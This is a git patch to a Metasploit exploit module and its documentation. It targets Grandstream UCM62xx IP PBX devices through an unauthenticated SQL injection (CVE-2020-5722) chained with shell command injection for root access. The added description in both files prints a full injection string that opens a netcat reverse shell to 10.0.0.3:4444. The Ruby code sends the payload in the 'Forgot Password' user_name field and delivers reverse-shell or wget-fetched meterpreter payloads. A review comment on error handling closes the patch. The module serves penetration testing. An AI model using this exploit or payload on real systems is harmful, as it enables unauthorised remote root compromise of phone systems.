From 2c989ec714607854767bafb4eabb5760db9ecfa0 Mon Sep 17 00:00:00 2001
From: Jake Baines
Date: Sat, 22 Jan 2022 14:09:58 -0800
Subject: [PATCH] Addressed multiple review comments (spelling, doc details, randomization, etc)
---
 .../http/grandstream_ucm62xx_sendemail_rce.md | 32 ++++++++++----
 .../http/grandstream_ucm62xx_sendemail_rce.rb | 43 +++++++++++--------
 2 files changed, 48 insertions(+), 27 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
index 92232f4ef7..626d2728d6 100644
--- a/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
+++ b/documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
@@ -2,21 +2,35 @@
 ### Description
-This module exploits unauthenticated SQL and command injection vulnerabilities affecting
-the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
-unauthenticated and remote attacker to execute commands as root. This module affects
-UCM62xx versions before firmware version 1.0.19.20.
+This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
+a command injection vulnerability (technically, no assigned CVE but was inadvertently
+patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
+series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
+execute commands as `root`.
+
+Exploitation happens in two stages:
+
+1. An SQL injection during username lookup while executing the "Forgot Password" function.
+2. After successful SQL injection the user provided username is passed to a python script
+ via the shell. Like so:
+
+```
+ /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
+ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
+```
+
+This module affect UCM62xx versions before firmware version 1.0.19.20.
 ### Installation
-The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
+The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
 However, if you have a device, affected firmware can be downloaded here:
 * https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip
 ## Verification Steps
-* Acquire an affected device and configure with affected firmware
+* Acquire an affected device and configure it with the affected firmware
 * Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
 * Do: `set RHOST `
 * Do: `check`
@@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:
 ### 0
-By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
+This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
 ### 1
-By default, this target obtains a meterpreter session using `wget`.
+This target obtains a meterpreter session using `wget`.
 ## Options
@@ -103,7 +117,7 @@ Revision : 63015
 Serial : 1126b9d4eacb275c
 ```
-### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
+### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.
 ```
 msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
diff --git a/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb b/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
index c4fc5f5ffc..f4e50efaa4 100644
--- a/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
+++ b/modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
@@ -16,10 +16,22 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ - This module exploits unauthenticated SQL and command injection vulnerabilities affecting - the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an - unauthenticated and remote attacker to execute commands as root. This module affects - UCM62xx versions before firmware version 1.0.19.20. + This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and + a command injection vulnerability (technically, no assigned CVE but was inadvertently + patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX + series of devices. The vulnerabilities allow an unauthenticated and remote attacker to + execute commands as root. + + Exploitation happens in two stages: + + 1. An SQL injection during username lookup while executing the "Forgot Password" function. + 2. After successful SQL injection the user provided username is passed to a python script + via the shell. Like so: + + /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ + password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 ` + + This module affect UCM62xx versions before firmware version 1.0.19.20. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -55,10 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, - 'CmdStagerFlavor' => [ 'wget' ], - 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' - } + 'CmdStagerFlavor' => [ 'wget' ] } ] ], 
@@ -95,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
 ###
 def check
 normalized_uri = normalize_uri(target_uri.path, '/cgi')
- print_status("Requesting version information from #{normalized_uri}")
+ vprint_status("Requesting version information from #{normalized_uri}")
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalized_uri,
@@ -107,20 +116,17 @@ class MetasploitModule < Msf::Exploit::Remote
 body_json = res.get_json_document
 return CheckCode::Unknown('No JSON in response') unless body_json
- resp_json = body_json['response']
- return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
+ prog_version = body_json.dig('response', 'prog_version')
+ return false if prog_version.nil?
- prog_version = resp_json['prog_version']
- return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version
-
- print_status("The reported version is: #{prog_version}")
+ vprint_status("The reported version is: #{prog_version}")
 version = Rex::Version.new(prog_version)
 if version < Rex::Version.new('1.0.19.20')
- return CheckCode::Appears('This determination is based on the version string.')
+ return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
 end
- return CheckCode::Safe('This determination is based on the version string.')
+ return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
 end
 ##
@@ -136,13 +142,14 @@ class MetasploitModule < Msf::Exploit::Remote
 # payloads are appropriate.
 ###
 def execute_command(cmd, _opts = {})
+ rand_num = Rex::Text.rand_text_numeric(1..5)
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path, '/cgi'),
 'vars_post' => {
 'action' => 'sendPasswordEmail',
- 'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
+ 'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
 }
 }, 5)
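Review bot: `return false if prog_version.nil?` in the `@@ -107,20 +116,17 @@` hunk breaks the contract of `check`, which on every other path in this hunk returns a `CheckCode`; the two lines it replaces returned `CheckCode::Unknown` for the missing element, so this should be `return CheckCode::Unknown('The JSON response is missing the prog_version element') if prog_version.nil?` rather than a bare `false`. The value handed to `Rex::Version.new` a few lines later comes straight from the device's JSON, and if `Rex::Version` follows `Gem::Version` semantics a malformed string raises `ArgumentError` and aborts the check instead of reporting it; a guard such as `return CheckCode::Unknown("Unparseable version string: #{prog_version}") unless Rex::Version.correct?(prog_version)` before the comparison would keep `check` total on unexpected responses. The `def check` line sits in the preceding hunk; only the tail of the method is visible here.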